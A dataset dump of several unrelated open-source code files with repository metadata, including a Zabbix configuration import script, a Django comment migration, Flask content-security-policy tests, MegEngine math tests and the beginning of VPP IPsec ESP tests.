hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
acff55f2e701176a8086fea81b515674ad607dfd
| 3,858
|
py
|
Python
|
files/zabbix_content/import_all.py
|
dataart-telco/zabbix-restcomm-docker
|
fe0d6678746ce1206c4bbefe476cb5e42af7bf53
|
[
"Apache-2.0"
] | 1
|
2016-03-10T23:04:12.000Z
|
2016-03-10T23:04:12.000Z
|
files/zabbix_content/import_all.py
|
dataart-telco/zabbix-restcomm-docker
|
fe0d6678746ce1206c4bbefe476cb5e42af7bf53
|
[
"Apache-2.0"
] | null | null | null |
files/zabbix_content/import_all.py
|
dataart-telco/zabbix-restcomm-docker
|
fe0d6678746ce1206c4bbefe476cb5e42af7bf53
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
import pyzabbix, sys, json, os, time
if len(sys.argv) > 2:
IMPORT_DIR = sys.argv[1]
ZABBIX_SERVER = sys.argv[2]
else:
IMPORT_DIR = "import_pack"
ZABBIX_SERVER = 'http://localhost'
print "*****"
print "** App iports files in Lexicographical order from '{0}' folder".format(IMPORT_DIR)
print "*****"
print ""
zapi = pyzabbix.ZabbixAPI(ZABBIX_SERVER)
zapi.login('admin', 'zabbix')
def readFile(f):
    """Return the entire contents of the text file at path *f*."""
    with open(f, 'r') as handle:
        return handle.read()
def importAction( str ):
    """Create each Zabbix action described by a JSON list.

    Note: the parameter shadows the builtin ``str``; it holds raw JSON text.
    """
    data = json.loads(str)
    for action in data:
        try:
            # Log the payload before sending it to the API.
            print "Create: {0}".format(json.dumps(action))
            zapi.action.create(action)
        except pyzabbix.ZabbixAPIException as e:
            # Report and continue so one failing action does not stop the rest.
            print e
def importHostGroups( str ):
    """Create the host groups listed in a JSON document (only ``name`` is used).

    Note: the parameter shadows the builtin ``str``; it holds raw JSON text.
    """
    data = json.loads(str)
    for group in data:
        try:
            zapi.hostgroup.create({"name": group["name"]})
        except pyzabbix.ZabbixAPIException as e:
            # Report and continue (e.g. when the group already exists).
            print e
def importTemplate(json_text):
    """Create Zabbix templates from raw JSON text.

    The parameter was renamed from ``str`` to avoid shadowing the builtin;
    the function is called positionally, so callers are unaffected.
    """
    data = json.loads(json_text)
    zapi.template.create(data)
def importTemplateXml( template ):
    """Import a Zabbix XML export via the configuration.import API."""
    # Every section is both created and updated, except 'groups',
    # which only supports creation.
    full_sync = {'createMissing': 'true', 'updateExisting': 'true'}
    rules = {
        section: dict(full_sync)
        for section in (
            'applications', 'discoveryRules', 'graphs', 'hosts', 'images',
            'items', 'maps', 'screens', 'templateLinkage', 'templates',
            'templateScreens', 'triggers',
        )
    }
    rules['groups'] = {'createMissing': 'true'}
    zapi.confimport('xml', template, rules)
def readHostGroupVars():
    """Map normalized host-group names to their Zabbix group ids.

    Keys are the group names upper-cased with spaces replaced by
    underscores; used to fill REPLACE_ME_GROUP_* placeholders.
    The local was renamed from ``vars`` to avoid shadowing the builtin.
    """
    return {
        g["name"].upper().replace(" ", "_"): g["groupid"]
        for g in zapi.hostgroup.get()
    }
def readTemplatesGroupVars():
    """Map normalized template names to their Zabbix template ids.

    Keys are the template names upper-cased with spaces replaced by
    underscores; used to fill REPLACE_ME_TPLS_* placeholders.
    The local was renamed from ``vars`` to avoid shadowing the builtin.
    """
    return {
        t["name"].upper().replace(" ", "_"): t["templateid"]
        for t in zapi.template.get()
    }
def replaceVars(data, prefix, dic):
    """Replace every ``<prefix+key>`` placeholder in *data* with its value.

    *dic* maps placeholder suffixes to replacement strings.
    ``items()`` replaces the Python-2-only ``iteritems()``; behaviour is
    identical and the helper stays portable.
    """
    for key, value in dic.items():
        data = data.replace("<" + prefix + key + ">", value)
    return data
# Walk the import folder in sorted (lexicographical) order and dispatch
# each file to the matching importer based on its file name.
dir = os.path.abspath(IMPORT_DIR)
for fileName in sorted(os.listdir(IMPORT_DIR)):
    print ""
    print "import {0}".format(fileName)
    print "-----"
    f = os.path.join(dir, fileName)
    data = readFile(f)
    # Brief pause between imports -- presumably to avoid hammering the
    # Zabbix API; TODO confirm this is still needed.
    time.sleep(1)
    basename = os.path.basename(f)
    if "action" in basename:
        # Actions can reference groups/templates by placeholder, so the
        # current ids are looked up and substituted first.
        varGroups = readHostGroupVars()
        varTpls = readTemplatesGroupVars()
        data = replaceVars(data, "REPLACE_ME_GROUP_", varGroups)
        data = replaceVars(data, "REPLACE_ME_TPLS_", varTpls)
        importAction(data)
        continue
    if "hostgroup" in basename:
        importHostGroups(data)
        continue
    # Check the specific "template.xml" match before the generic
    # "template" match -- order matters here.
    if "template.xml" in basename:
        importTemplateXml(data)
        continue
    if "template" in basename:
        importTemplate(data)
        continue
| 26.244898
| 89
| 0.537066
|
acff56f01eb4d75139b1709b2ec135151d193a6a
| 2,917
|
py
|
Python
|
src/softfab/pages/ResTypeIndex.py
|
boxingbeetle/softfab
|
0ecf899f66a1fb046ee869cbfa3b5374b3f8aa14
|
[
"BSD-3-Clause"
] | 20
|
2019-02-07T17:03:04.000Z
|
2020-03-16T20:45:19.000Z
|
src/softfab/pages/ResTypeIndex.py
|
boxingbeetle/softfab
|
0ecf899f66a1fb046ee869cbfa3b5374b3f8aa14
|
[
"BSD-3-Clause"
] | 36
|
2019-02-11T08:57:16.000Z
|
2020-09-29T05:32:08.000Z
|
src/softfab/pages/ResTypeIndex.py
|
boxingbeetle/softfab
|
0ecf899f66a1fb046ee869cbfa3b5374b3f8aa14
|
[
"BSD-3-Clause"
] | null | null | null |
# SPDX-License-Identifier: BSD-3-Clause
from functools import partial
from typing import Any, ClassVar, Iterator, cast
from softfab.FabPage import FabPage
from softfab.Page import PageProcessor
from softfab.databaselib import Retriever
from softfab.datawidgets import (
BoolDataColumn, DataColumn, DataTable, LinkColumn
)
from softfab.pageargs import IntArg, PageArgs, SortArg
from softfab.resourcelib import ResourceDB
from softfab.restypelib import ResType, ResTypeDB
from softfab.users import User, checkPrivilege
from softfab.xmlgen import XMLContent
def numResourcesOfType(resourceDB: ResourceDB, resType: ResType) -> int:
    """Return how many resources in *resourceDB* have *resType*'s id."""
    matching = resourceDB.resourcesOfType(resType.getId())
    return len(matching)
class ResCountLinkColumn(LinkColumn[ResType]):
    """Table column showing the number of resources of each type,
    rendered as a link to the 'Capabilities' page for that type."""
    keyName = 'count'
    cellStyle = 'rightalign'

    def __init__(self) -> None:
        # '#' is the column header; 'Capabilities' is the link target page.
        super().__init__('#', 'Capabilities', idArg='restype')

    def getSortKey(self, proc: PageProcessor) -> Retriever[ResType, str]:
        # Sort rows by the per-type resource count.
        assert isinstance(proc, ResTypeIndex_GET.Processor)
        return cast(Retriever[ResType, str],
                    partial(numResourcesOfType, proc.resourceDB))

    def presentCell(self, record: ResType, **kwargs: object) -> XMLContent:
        proc = kwargs['proc']
        assert isinstance(proc, ResTypeIndex_GET.Processor)
        # Use the count as the link's text content.
        return self.presentLink(record, **kwargs)[
            numResourcesOfType(proc.resourceDB, record)
        ]
class ResTypeLinkColumn(LinkColumn[ResType]):
    """Link column that suppresses the link for built-in resource types."""

    def presentCell(self, record: ResType, **kwargs: object) -> XMLContent:
        # Types whose id starts with 'sf.' get a dash instead of a link.
        if not record.getId().startswith('sf.'):
            return super().presentCell(record, **kwargs)
        return '-'
class ResTypeTable(DataTable[ResType]):
    """Table of all resource types: name, resource count, per-task/per-job
    flags, and edit/delete links."""
    dbName = 'resTypeDB'
    columns = (
        DataColumn[ResType](keyName = 'presentationName', label = 'Name'),
        ResCountLinkColumn(),
        BoolDataColumn[ResType](keyName = 'pertask', label = 'Per Task'),
        BoolDataColumn[ResType](keyName = 'perjob', label = 'Per Job'),
        ResTypeLinkColumn('Edit', 'ResTypeEdit'),
        ResTypeLinkColumn('Delete', 'ResTypeDelete'),
    )
class ResTypeIndex_GET(FabPage['ResTypeIndex_GET.Processor',
                               'ResTypeIndex_GET.Arguments']):
    """GET page that lists all resource types in a sortable table."""
    icon = 'IconResources'
    description = 'Resource Types'
    children = [ 'ResTypeEdit', 'ResTypeDelete' ]

    class Arguments(PageArgs):
        # Pagination offset and sort order for the table.
        first = IntArg(0)
        sort = SortArg()

    class Processor(PageProcessor['ResTypeIndex_GET.Arguments']):
        # Databases are injected as class attributes by the framework.
        resTypeDB: ClassVar[ResTypeDB]
        resourceDB: ClassVar[ResourceDB]

    def checkAccess(self, user: User) -> None:
        # Listing resource types requires the 'rt/l' privilege.
        checkPrivilege(user, 'rt/l')

    def iterDataTables(self, proc: Processor) -> Iterator[DataTable[Any]]:
        yield ResTypeTable.instance

    def presentContent(self, **kwargs: object) -> XMLContent:
        return ResTypeTable.instance.present(**kwargs)
| 35.573171
| 75
| 0.687693
|
acff57810821b4bb7fa3978755138cba27fa72ad
| 739
|
py
|
Python
|
python/ray/data/datasource/binary_datasource.py
|
77loopin/ray
|
9322f6aab53f4ca5baf5a3573e1ffde12feae519
|
[
"Apache-2.0"
] | 21,382
|
2016-09-26T23:12:52.000Z
|
2022-03-31T21:47:45.000Z
|
python/ray/data/datasource/binary_datasource.py
|
77loopin/ray
|
9322f6aab53f4ca5baf5a3573e1ffde12feae519
|
[
"Apache-2.0"
] | 19,689
|
2016-09-17T08:21:25.000Z
|
2022-03-31T23:59:30.000Z
|
python/ray/data/datasource/binary_datasource.py
|
77loopin/ray
|
9322f6aab53f4ca5baf5a3573e1ffde12feae519
|
[
"Apache-2.0"
] | 4,114
|
2016-09-23T18:54:01.000Z
|
2022-03-31T15:07:32.000Z
|
from typing import TYPE_CHECKING
if TYPE_CHECKING:
import pyarrow
from ray.data.datasource.file_based_datasource import (FileBasedDatasource)
class BinaryDatasource(FileBasedDatasource):
    """Binary datasource, for reading and writing binary files.

    Examples:
        >>> source = BinaryDatasource()
        >>> ray.data.read_datasource(source, paths="/path/to/dir").take()
        ... [b"file_data", ...]
    """

    def _read_file(self, f: "pyarrow.NativeFile", path: str, **reader_args):
        # Read the whole file; optionally pair the payload with its path.
        want_paths = reader_args.pop("include_paths", False)
        contents = f.readall()
        return (path, contents) if want_paths else contents

    def _rows_per_file(self):
        # Each binary file becomes exactly one dataset row.
        return 1
| 26.392857
| 76
| 0.64682
|
acff57bb3502071b42fadff8c7ea1ad2a2c53aa4
| 1,270
|
py
|
Python
|
comment/migrations/0001_initial.py
|
fihyer/typedia
|
87ac445f5ca65582344847a0c414b9604e40192b
|
[
"MIT"
] | null | null | null |
comment/migrations/0001_initial.py
|
fihyer/typedia
|
87ac445f5ca65582344847a0c414b9604e40192b
|
[
"MIT"
] | 1
|
2022-03-02T15:12:40.000Z
|
2022-03-02T15:12:40.000Z
|
comment/migrations/0001_initial.py
|
fihyer/typeidea
|
87ac445f5ca65582344847a0c414b9604e40192b
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.12 on 2021-02-20 03:14
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial migration: creates the Comment model attached to blog posts."""

    initial = True

    dependencies = [
        # Comment.target references blog.Post, so blog's initial migration
        # must be applied first.
        ('blog', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='Comment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # verbose_name values are user-facing (Chinese) admin labels.
                ('content', models.CharField(max_length=2000, verbose_name='内容')),
                ('nickname', models.CharField(max_length=50, verbose_name='昵称')),
                ('website', models.URLField(verbose_name='网站')),
                ('email', models.EmailField(max_length=254, verbose_name='邮箱')),
                # status: 1 = normal, 0 = deleted (per the choices tuple).
                ('status', models.PositiveIntegerField(choices=[(1, '正常'), (0, '删除')], default=1, verbose_name='状态')),
                ('created_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
                # Deleting the target post cascades to its comments.
                ('target', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Post', verbose_name='评论目标')),
            ],
            options={
                'verbose_name': '评论',
                'verbose_name_plural': '评论',
            },
        ),
    ]
| 37.352941
| 128
| 0.577165
|
acff582053d12f4104237452188dd15a17eeb173
| 1,551
|
py
|
Python
|
unit_tests/test_content_security_policy.py
|
LandRegistry/digital-street-title-ui
|
3477c51be8806289da02c758ca5f0732d0444a8f
|
[
"MIT"
] | null | null | null |
unit_tests/test_content_security_policy.py
|
LandRegistry/digital-street-title-ui
|
3477c51be8806289da02c758ca5f0732d0444a8f
|
[
"MIT"
] | null | null | null |
unit_tests/test_content_security_policy.py
|
LandRegistry/digital-street-title-ui
|
3477c51be8806289da02c758ca5f0732d0444a8f
|
[
"MIT"
] | 3
|
2019-04-26T06:38:12.000Z
|
2021-04-11T05:22:21.000Z
|
import json
import unittest
from unittest import mock
from title_ui.main import app
from title_ui.custom_extensions.content_security_policy.main import ContentSecurityPolicy
class TestContentSecurityPolicy(unittest.TestCase):
    """Tests for the ContentSecurityPolicy Flask extension and report route."""

    def setup_method(self, method):
        # pytest-style per-test setup: fresh test client for each test.
        self.app = app.test_client()

    @mock.patch('title_ui.custom_extensions.content_security_policy.main.ContentSecurityPolicy.init_app')
    def test_extension_alternative_init(self, mock_init_app):
        # Passing an app to the constructor must delegate to init_app().
        ContentSecurityPolicy('foo')
        mock_init_app.assert_called_once_with('foo')

    def test_reporting_mode(self):
        # 'report-only' mode must emit the Report-Only header variant.
        app.config['CONTENT_SECURITY_POLICY_MODE'] = 'report-only'
        response = self.app.get('/')
        assert 'script-src' in response.headers['Content-Security-Policy-Report-Only']

    def test_full_mode(self):
        # 'full' mode must emit the enforcing header.
        app.config['CONTENT_SECURITY_POLICY_MODE'] = 'full'
        response = self.app.get('/')
        assert 'script-src' in response.headers['Content-Security-Policy']

    @mock.patch('title_ui.custom_extensions.content_security_policy.reporting.logger.error')
    def test_report_route(self, mock_logger):
        # Posting a CSP violation report must log it and answer 204 No Content.
        response = self.app.post('/content-security-policy-report/?trace_id=Hello',
                                 data=json.dumps({'csp-report': {'foo': 'bar'}}),
                                 content_type='application/json')
        mock_logger.assert_called_once_with('CSP violation', extra={
            'content_security_policy_report': {'foo': 'bar'}
        })
        assert response.status_code == 204
| 37.829268
| 105
| 0.695035
|
acff5858e40d1cf608b13b125fcb2057f293f839
| 4,038
|
py
|
Python
|
imperative/python/test/unit/functional/test_math.py
|
googol-lab/MegEngine
|
e0193cc4431371719a6ddb0fa85f910c5583bfc8
|
[
"Apache-2.0"
] | 1
|
2021-03-25T01:13:24.000Z
|
2021-03-25T01:13:24.000Z
|
imperative/python/test/unit/functional/test_math.py
|
googol-lab/MegEngine
|
e0193cc4431371719a6ddb0fa85f910c5583bfc8
|
[
"Apache-2.0"
] | 1
|
2021-05-27T08:55:38.000Z
|
2021-05-27T08:55:38.000Z
|
imperative/python/test/unit/functional/test_math.py
|
googol-lab/MegEngine
|
e0193cc4431371719a6ddb0fa85f910c5583bfc8
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
from functools import partial
import numpy as np
from utils import opr_test
import megengine.functional as F
from megengine import tensor
def common_test_reduce(opr, ref_opr):
    """Check reduction *opr* against its numpy reference *ref_opr* on two
    random float32 inputs, covering the default axis and every axis
    (plus keepdims for the value-returning reductions)."""
    cases = [
        {"input": np.random.random(shape).astype(np.float32)}
        for shape in ((5, 6, 7), (2, 9, 12))
    ]
    if opr in (F.argmin, F.argmax):
        # Index-returning reductions: numpy yields int64, cast to int32.
        # Default axis first, then each explicit axis.
        opr_test(cases, opr, ref_fn=lambda x: ref_opr(x).astype(np.int32))
        for axis in range(0, 3):
            opr_test(
                cases,
                opr,
                ref_fn=lambda x: ref_opr(x, axis=axis).astype(np.int32),
                axis=axis,
            )
    else:
        # Default axis, then every axis with keepdims both off and on.
        opr_test(cases, opr, ref_fn=ref_opr)
        for axis in range(-3, 3):
            opr_test(cases, opr, ref_fn=lambda x: ref_opr(x, axis=axis), axis=axis)
            opr_test(
                cases,
                opr,
                ref_fn=lambda x: ref_opr(x, axis=axis, keepdims=True),
                axis=axis,
                keepdims=True,
            )
# One wrapper test per reduction operator, each validated against its
# numpy counterpart by common_test_reduce().
def test_sum():
    common_test_reduce(opr=F.sum, ref_opr=np.sum)


def test_prod():
    common_test_reduce(opr=F.prod, ref_opr=np.prod)


def test_mean():
    common_test_reduce(opr=F.mean, ref_opr=np.mean)


def test_var():
    common_test_reduce(opr=F.var, ref_opr=np.var)


def test_std():
    common_test_reduce(opr=F.std, ref_opr=np.std)


def test_min():
    common_test_reduce(opr=F.min, ref_opr=np.min)


def test_max():
    common_test_reduce(opr=F.max, ref_opr=np.max)


def test_argmin():
    common_test_reduce(opr=F.argmin, ref_opr=np.argmin)


def test_argmax():
    common_test_reduce(opr=F.argmax, ref_opr=np.argmax)
def test_sqrt():
    """Elementwise sqrt against numpy on two random 1-D float32 inputs."""
    cases = [
        {"input": np.random.random((15,)).astype(np.float32)},
        {"input": np.random.random((25,)).astype(np.float32)},
    ]
    opr_test(cases, F.sqrt, ref_fn=np.sqrt)
def test_sort():
    """F.sort must match (np.sort values, int32 np.argsort indices)."""
    cases = []
    for shape in ((10, 3), (12, 2)):
        arr = np.random.random(shape).astype(np.float32)
        expected = [np.sort(arr), np.argsort(arr).astype(np.int32)]
        cases.append({"input": arr, "output": expected})
    opr_test(cases, F.sort)
def test_normalize():
    """Check F.normalize against a numpy L-p normalization reference."""
    cases = [
        {"input": np.random.random((2, 3, 12, 12)).astype(np.float32)} for i in range(2)
    ]

    def np_normalize(x, p=2, axis=None, eps=1e-12):
        # Reference implementation: divide by the L-p norm, clamping the
        # norm away from zero with eps.
        if axis is None:
            norm = np.sum(x ** p) ** (1.0 / p)
        else:
            norm = np.sum(x ** p, axis=axis, keepdims=True) ** (1.0 / p)
        return x / np.clip(norm, a_min=eps, a_max=np.inf)

    # # Test L-2 norm along all dimensions
    # opr_test(cases, F.normalize, ref_fn=np_normalize)

    # # Test L-1 norm along all dimensions
    # opr_test(cases, partial(F.normalize, p=1), ref_fn=partial(np_normalize, p=1))

    # Test L-2 norm along the second dimension
    opr_test(cases, partial(F.normalize, axis=1), ref_fn=partial(np_normalize, axis=1))

    # Test some norm == 0
    # Zero out one row so the eps clamp path is exercised.
    cases[0]["input"][0, 0, 0, :] = 0
    cases[1]["input"][0, 0, 0, :] = 0
    opr_test(cases, partial(F.normalize, axis=3), ref_fn=partial(np_normalize, axis=3))
| 28.842857
| 88
| 0.620357
|
acff59317c389d2324fb157b16accc890a2da81b
| 1,052
|
py
|
Python
|
stix2slider/test/test_main.py
|
nhova/cti-stix-slider
|
3964c907cda457b747b711655f89c28e8cb863c1
|
[
"BSD-3-Clause"
] | 17
|
2017-11-29T19:11:41.000Z
|
2022-01-10T07:04:34.000Z
|
stix2slider/test/test_main.py
|
nhova/cti-stix-slider
|
3964c907cda457b747b711655f89c28e8cb863c1
|
[
"BSD-3-Clause"
] | 56
|
2017-11-29T01:20:32.000Z
|
2021-08-23T21:09:25.000Z
|
stix2slider/test/test_main.py
|
nhova/cti-stix-slider
|
3964c907cda457b747b711655f89c28e8cb863c1
|
[
"BSD-3-Clause"
] | 9
|
2017-11-29T17:57:31.000Z
|
2020-09-02T03:17:17.000Z
|
# Standard Library
from argparse import Namespace
# external
import pytest
# internal
from stix2slider import options
from stix2slider.options import (
SliderOptions, get_option_value, initialize_options
)
# Each parametrization supplies the options in a different container form:
# a SliderOptions instance, a plain dict, and an argparse Namespace.
@pytest.mark.parametrize("opts", [
    SliderOptions(no_squirrel_gaps=False, use_namespace="foobar", log_level="DEBUG", disabled=[201, 302]),
    {"no_squirrel_gaps": False, "use_namespace": "foobar", "log_level": "DEBUG", "disabled": [201, 302]},
    Namespace(file_=None, no_squirrel_gaps=False, validator_args="", enabled=None, disabled=[201, 302],
              silent=False, message_log_directory=None, output_directory=None, log_level="DEBUG",
              use_namespace="foobar"),
])
def test_setup_options(opts):
    """initialize_options must accept all three option container types
    and expose the same values through get_option_value()."""
    options.ALL_OPTIONS = None  # To make sure we can set it again
    initialize_options(opts)
    assert get_option_value("no_squirrel_gaps") is False
    assert get_option_value("use_namespace") == "foobar"
    assert get_option_value("log_level") == "DEBUG"
    assert get_option_value("disabled") == [201, 302]
| 37.571429
| 106
| 0.728137
|
acff594c55e0c7508839bb6c4bef807f22cf494b
| 3,698
|
py
|
Python
|
clients/python/lakefs_client/models/__init__.py
|
cmarat/lakeFS
|
a5e4693fe571fd289fa3d14f4fb0c00928d004c3
|
[
"Apache-2.0"
] | 1
|
2021-09-09T16:21:14.000Z
|
2021-09-09T16:21:14.000Z
|
clients/python/lakefs_client/models/__init__.py
|
cmarat/lakeFS
|
a5e4693fe571fd289fa3d14f4fb0c00928d004c3
|
[
"Apache-2.0"
] | null | null | null |
clients/python/lakefs_client/models/__init__.py
|
cmarat/lakeFS
|
a5e4693fe571fd289fa3d14f4fb0c00928d004c3
|
[
"Apache-2.0"
] | null | null | null |
# flake8: noqa
# import all models into this package
# if you have many models here with many references from one model to another this may
# raise a RecursionError
# to avoid this, import only the models that you directly need like:
# from from lakefs_client.model.pet import Pet
# or import this package, but before doing it, use:
# import sys
# sys.setrecursionlimit(n)
from lakefs_client.model.access_key_credentials import AccessKeyCredentials
from lakefs_client.model.action_run import ActionRun
from lakefs_client.model.action_run_list import ActionRunList
from lakefs_client.model.authentication_token import AuthenticationToken
from lakefs_client.model.branch_creation import BranchCreation
from lakefs_client.model.commit import Commit
from lakefs_client.model.commit_creation import CommitCreation
from lakefs_client.model.commit_list import CommitList
from lakefs_client.model.credentials import Credentials
from lakefs_client.model.credentials_list import CredentialsList
from lakefs_client.model.credentials_with_secret import CredentialsWithSecret
from lakefs_client.model.current_user import CurrentUser
from lakefs_client.model.diff import Diff
from lakefs_client.model.diff_list import DiffList
from lakefs_client.model.error import Error
from lakefs_client.model.garbage_collection_prepare_request import GarbageCollectionPrepareRequest
from lakefs_client.model.garbage_collection_prepare_response import GarbageCollectionPrepareResponse
from lakefs_client.model.garbage_collection_rule import GarbageCollectionRule
from lakefs_client.model.garbage_collection_rules import GarbageCollectionRules
from lakefs_client.model.group import Group
from lakefs_client.model.group_creation import GroupCreation
from lakefs_client.model.group_list import GroupList
from lakefs_client.model.hook_run import HookRun
from lakefs_client.model.hook_run_list import HookRunList
from lakefs_client.model.login_information import LoginInformation
from lakefs_client.model.merge import Merge
from lakefs_client.model.merge_result import MergeResult
from lakefs_client.model.merge_result_summary import MergeResultSummary
from lakefs_client.model.object_stage_creation import ObjectStageCreation
from lakefs_client.model.object_stats import ObjectStats
from lakefs_client.model.object_stats_list import ObjectStatsList
from lakefs_client.model.object_user_metadata import ObjectUserMetadata
from lakefs_client.model.pagination import Pagination
from lakefs_client.model.policy import Policy
from lakefs_client.model.policy_list import PolicyList
from lakefs_client.model.ref import Ref
from lakefs_client.model.ref_list import RefList
from lakefs_client.model.refs_dump import RefsDump
from lakefs_client.model.repository import Repository
from lakefs_client.model.repository_creation import RepositoryCreation
from lakefs_client.model.repository_list import RepositoryList
from lakefs_client.model.reset_creation import ResetCreation
from lakefs_client.model.revert_creation import RevertCreation
from lakefs_client.model.setup import Setup
from lakefs_client.model.staging_location import StagingLocation
from lakefs_client.model.staging_metadata import StagingMetadata
from lakefs_client.model.statement import Statement
from lakefs_client.model.storage_config import StorageConfig
from lakefs_client.model.storage_uri import StorageURI
from lakefs_client.model.tag_creation import TagCreation
from lakefs_client.model.underlying_object_properties import UnderlyingObjectProperties
from lakefs_client.model.user import User
from lakefs_client.model.user_creation import UserCreation
from lakefs_client.model.user_list import UserList
from lakefs_client.model.version_config import VersionConfig
| 55.19403
| 100
| 0.887236
|
acff595996b6b0fb67f8a3afd1a68741724f24bf
| 51,618
|
py
|
Python
|
test/test_ipsec_esp.py
|
StanleyLiao/vpp
|
8f10b9050dc6318d7ccb3982eec2ed742752c6ea
|
[
"Apache-2.0"
] | null | null | null |
test/test_ipsec_esp.py
|
StanleyLiao/vpp
|
8f10b9050dc6318d7ccb3982eec2ed742752c6ea
|
[
"Apache-2.0"
] | null | null | null |
test/test_ipsec_esp.py
|
StanleyLiao/vpp
|
8f10b9050dc6318d7ccb3982eec2ed742752c6ea
|
[
"Apache-2.0"
] | null | null | null |
import socket
import unittest
from scapy.layers.ipsec import ESP
from scapy.layers.inet import IP, ICMP, UDP
from scapy.layers.inet6 import IPv6
from scapy.layers.l2 import Ether
from scapy.packet import Raw
from parameterized import parameterized
from framework import VppTestRunner
from template_ipsec import IpsecTra46Tests, IpsecTun46Tests, TemplateIpsec, \
IpsecTcpTests, IpsecTun4Tests, IpsecTra4Tests, config_tra_params, \
config_tun_params, IPsecIPv4Params, IPsecIPv6Params, \
IpsecTra4, IpsecTun4, IpsecTra6, IpsecTun6, \
IpsecTun6HandoffTests, IpsecTun4HandoffTests, \
IpsecTra6ExtTests
from vpp_ipsec import VppIpsecSpd, VppIpsecSpdEntry, VppIpsecSA,\
VppIpsecSpdItfBinding
from vpp_ip_route import VppIpRoute, VppRoutePath
from vpp_ip import DpoProto
from vpp_papi import VppEnum
NUM_PKTS = 67
engines_supporting_chain_bufs = ["openssl"]
engines = ["ia32", "ipsecmb", "openssl"]
class ConfigIpsecESP(TemplateIpsec):
    """Shared configuration for the ESP tests: declares the encrypt/decrypt
    graph node names for IPv4/IPv6 transport and tunnel modes, and provides
    helpers to build and tear down the SPDs, SAs and policies."""
    encryption_type = ESP
    tra4_encrypt_node_name = "esp4-encrypt"
    tra4_decrypt_node_name = ["esp4-decrypt", "esp4-decrypt-post"]
    tra6_encrypt_node_name = "esp6-encrypt"
    tra6_decrypt_node_name = ["esp6-decrypt", "esp6-decrypt-post"]
    tun4_encrypt_node_name = "esp4-encrypt"
    tun4_decrypt_node_name = ["esp4-decrypt", "esp4-decrypt-post"]
    tun6_encrypt_node_name = "esp6-encrypt"
    tun6_decrypt_node_name = ["esp6-decrypt", "esp6-decrypt-post"]

    @classmethod
    def setUpClass(cls):
        super(ConfigIpsecESP, cls).setUpClass()

    @classmethod
    def tearDownClass(cls):
        super(ConfigIpsecESP, cls).tearDownClass()

    def setUp(self):
        super(ConfigIpsecESP, self).setUp()

    def tearDown(self):
        super(ConfigIpsecESP, self).tearDown()

    def config_network(self, params):
        """Create the transport and tunnel SPDs, bind them to interfaces,
        then configure SAs/policies and routes for every param set."""
        self.net_objs = []
        self.tun_if = self.pg0
        self.tra_if = self.pg2
        self.logger.info(self.vapi.ppcli("show int addr"))
        self.tra_spd = VppIpsecSpd(self, self.tra_spd_id)
        self.tra_spd.add_vpp_config()
        self.net_objs.append(self.tra_spd)
        self.tun_spd = VppIpsecSpd(self, self.tun_spd_id)
        self.tun_spd.add_vpp_config()
        self.net_objs.append(self.tun_spd)
        # Bind the tunnel SPD to the tunnel interface ...
        b = VppIpsecSpdItfBinding(self, self.tun_spd,
                                  self.tun_if)
        b.add_vpp_config()
        self.net_objs.append(b)
        # ... and the transport SPD to the transport interface.
        b = VppIpsecSpdItfBinding(self, self.tra_spd,
                                  self.tra_if)
        b.add_vpp_config()
        self.net_objs.append(b)
        for p in params:
            self.config_esp_tra(p)
            config_tra_params(p, self.encryption_type)
        for p in params:
            self.config_esp_tun(p)
            config_tun_params(p, self.encryption_type, self.tun_if)
        for p in params:
            # Route each remote tunnel host via the tunnel interface peer.
            d = DpoProto.DPO_PROTO_IP6 if p.is_ipv6 else DpoProto.DPO_PROTO_IP4
            r = VppIpRoute(self, p.remote_tun_if_host, p.addr_len,
                           [VppRoutePath(self.tun_if.remote_addr[p.addr_type],
                                         0xffffffff,
                                         proto=d)])
            r.add_vpp_config()
            self.net_objs.append(r)
        self.logger.info(self.vapi.ppcli("show ipsec all"))

    def unconfig_network(self):
        """Remove all configured objects in reverse creation order."""
        for o in reversed(self.net_objs):
            o.remove_vpp_config()
        self.net_objs = []

    def config_esp_tun(self, params):
        """Configure tunnel-mode SAs and SPD policies for one param set."""
        addr_type = params.addr_type
        scapy_tun_sa_id = params.scapy_tun_sa_id
        scapy_tun_spi = params.scapy_tun_spi
        vpp_tun_sa_id = params.vpp_tun_sa_id
        vpp_tun_spi = params.vpp_tun_spi
        auth_algo_vpp_id = params.auth_algo_vpp_id
        auth_key = params.auth_key
